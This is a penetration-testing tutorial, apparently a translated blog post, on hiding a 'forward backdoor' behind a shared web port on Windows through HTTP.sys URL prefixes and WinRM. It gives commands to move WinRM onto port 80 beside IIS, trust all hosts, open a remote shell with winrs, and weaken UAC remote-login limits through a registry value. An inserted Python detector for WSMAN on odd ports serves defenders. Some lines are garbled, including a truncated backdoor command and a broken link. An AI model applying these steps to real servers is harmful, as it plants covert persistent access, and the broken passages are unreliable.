Penetration Testing-Port Reuse Forward Backdoor

Notes on port reuse


0x01 About port multiplexing

Port reuse is an old backdoor technique. Implementations typically hijack the memory space of web-server-related processes or services, hook system APIs, or even hijack network drivers to achieve their goal.

Winsock allows a server to bind the same port more than once. When several sockets are bound, an incoming connection is delivered to the socket with the most specific binding; no special privilege is involved. This multiple binding is what is called port multiplexing.

The notes here focus on how web services and the HTTP.sys driver share ports, and on the forward backdoor built on top of that mechanism.



0x02 Net.TCP Port Sharing

Put simply, when TCP/IP was first introduced, each application protocol was assigned a unique 16-bit port number, so the port number alone distinguished applications.

Deploying applications that use non-standard ports is often complicated or even impossible because of corporate and personal firewalls.

With the Net.TCP Port Sharing service provided by Microsoft, different applications can share the same server port as long as they follow the relevant development interface rules.

In the HTTP.sys model, many different HTTP applications are multiplexed onto a single TCP port. This model has become the standard on the Windows platform: it gives firewall administrators a single point of control and lets application developers minimize the deployment cost of new network applications.

The ability to share a port between multiple HTTP applications has long been a feature of Internet Information Services (IIS). However, it was only with the introduction of HTTP.sys (the kernel-mode HTTP protocol listener) in IIS 6.0 that this infrastructure became fully available.




(1) When IIS or other applications use the HTTP Server API to listen for requests on a path, they must register a URL prefix with HTTP.sys. For the rules on registering URLs, see MSDN: com/en-us/library/windows/desktop/aa364698(v=vs.85).aspx . This is the registration process.

(2) When a request arrives and is received by http.sys, it is dispatched to the application that registered the matching URL. This is the routing process.

So the concept of port reuse is simple: use the HTTP Server API to register different URL request prefixes, and let http.sys dispatch requests for different URLs to different applications. The result is that different applications share one port.






0x03 http.sys && WinRM

HTTP.sys driver

The HTTP.sys driver is the main component of IIS.

The command

netsh http show servicestate

lists all URL prefixes registered with HTTP.sys.

In fact, WinRM registers the wsman URL prefix with HTTP.sys and listens on port 5985 by default. This can also be seen in the WinRM architecture diagram published by Microsoft.



0x04 Port multiplexing forward backdoor implementation

Native support for web application development based on Net.TCP Port Sharing




The first step is to register a UrlPrefix in the correct format.

UrlPrefix format

A UrlPrefix has the following syntax:

"Scheme://Host:Port/relativeURI"

Examples (reconstructed from the garbled original; "+" is the wildcard host):

"http://+:80/"
"https://+:80/<virtual root>/"



The forward backdoor program registers its URL prefix:


C:\Documents and Settings\Administrator>" C:\Documents and Settings\Administrator\Desktop\door\d



Specify the address to connect to.

There is also a common pseudo port reuse scenario:

By default, Winsock does not allow multiple bindings to the same address and port. We can instead bind to different local addresses, such as 192.168.1.*.



0x05 WinRM forward backdoor

WinRM service

WinRM (Windows Remote Management) is part of Microsoft's server hardware management features and can manage local or remote servers. The WinRM service lets administrators log in to the Windows operating system remotely and obtain an interactive command-line shell similar to Telnet. The underlying communication protocol is HTTP.



Enable the WinRM service

On Windows Server 2012 and later, the WinRM service is started by default and listens on port 5985.

On Windows Server 2008, WinRM must be started with a command. The quick configuration and startup command is

winrm quickconfig -q

After this command runs, it automatically adds a firewall exception rule and opens port 5985.


Add a port 80 listener

For a machine where WinRM is already enabled, the original port 5985 listener must be kept while a port 80 listener is added, so that the administrator's existing port 5985 access keeps working and we can also reach WinRM through port 80.

Use the following command to add a port 80 listener:

winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}

On Windows Server 2012 and later, this single command is enough to achieve port reuse.

The original port 5985 listener is retained.




Modify the port to 80:

winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"}

After configuration, WinRM has a listener on port 80, and the IIS web service still runs normally.
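As an added defender-side check (example code written for these notes, not from the original post or any Microsoft tool), the functions below parse the Registered URLs from `netsh http show servicestate` output using the UrlPrefix syntax given in section 0x04 and flag any WSMAN prefix bound to a port other than WinRM's defaults, which is exactly what the port 80 listener above produces. The servicestate excerpt is constructed in the shape of the real command's output, and the set of default ports is an assumption based on WinRM's standard 5985/5986/47001 listeners.

```python
import re

# Constructed excerpt in the shape of `netsh http show servicestate` output
# (not captured from a real host): WinRM's WSMAN prefix is registered on the
# default port 5985 and, after the listener change, on port 80 as well.
SAMPLE_SERVICESTATE = """\
Snapshot of HTTP service state (Server Session View):
-----------------------------------------------------
Server session ID: FF00000020000001
    URL groups:
    URL group ID: FE00000040000001
        State: Active
        Number of registered URLs: 2
        Registered URLs:
            HTTP://+:5985/WSMAN/
            HTTP://+:80/WSMAN/
"""

# Assumed baseline: ports WinRM listens on by default (HTTP, HTTPS, legacy).
WINRM_DEFAULT_PORTS = {5985, 5986, 47001}

# A registered URL is printed on a line of its own under "Registered URLs:".
URL_PREFIX_RE = re.compile(r"^\s*(https?://\S+)\s*$", re.IGNORECASE | re.MULTILINE)


def parse_url_prefix(prefix):
    """Split an HTTP.sys UrlPrefix "Scheme://Host:Port/relativeURI" into parts.
    Host may be a name, a bracketed IPv6 address, or the wildcards '+' / '*'."""
    scheme, rest = prefix.split("://", 1)
    hostport, _, path = rest.partition("/")
    host, _, port = hostport.rpartition(":")   # rpartition keeps IPv6 colons in host
    if not port.isdigit():
        raise ValueError(f"UrlPrefix without a port: {prefix!r}")
    return {"scheme": scheme.lower(), "host": host, "port": int(port), "path": "/" + path}


def registered_prefixes(servicestate_text):
    """All URL prefixes HTTP.sys reports as registered, parsed into parts."""
    return [parse_url_prefix(m) for m in URL_PREFIX_RE.findall(servicestate_text)]


def find_suspicious_wsman_prefixes(servicestate_text):
    """WSMAN (WinRM) prefixes registered on ports outside the default set,
    e.g. a compatibility listener or a listener moved to port 80."""
    return [p for p in registered_prefixes(servicestate_text)
            if p["path"].upper().startswith("/WSMAN") and p["port"] not in WINRM_DEFAULT_PORTS]


if __name__ == "__main__":
    for hit in find_suspicious_wsman_prefixes(SAMPLE_SERVICESTATE):
        print(f"WSMAN on non-default port {hit['port']}: {hit['scheme']}://{hit['host']}{hit['path']}")
```

On a real host, save the output of `netsh http show servicestate` to a file and pass its contents to `find_suspicious_wsman_prefixes`; `winrm enumerate winrm/config/listener` gives the same view from WinRM's side.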



Backdoor connection:

To connect to the WinRM service from the local machine, first configure and start the local WinRM service, then set the target host as trusted, using the following two commands:

winrm quickconfig -q

winrm set winrm/config/Client @{TrustedHosts="*"}


Connecting

Use the winrs command to connect to the remote WinRM service, run a command, and return its result:

winrs -r: -p:xxxxx whoami

You can also run cmd to get an interactive shell.



The WinRM service is also affected by UAC: by default only the built-in Administrator account can log in remotely, and other members of the local Administrators group cannot log in to WinRM remotely. To allow other users in the local Administrators group to log in, modify the registry:

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f







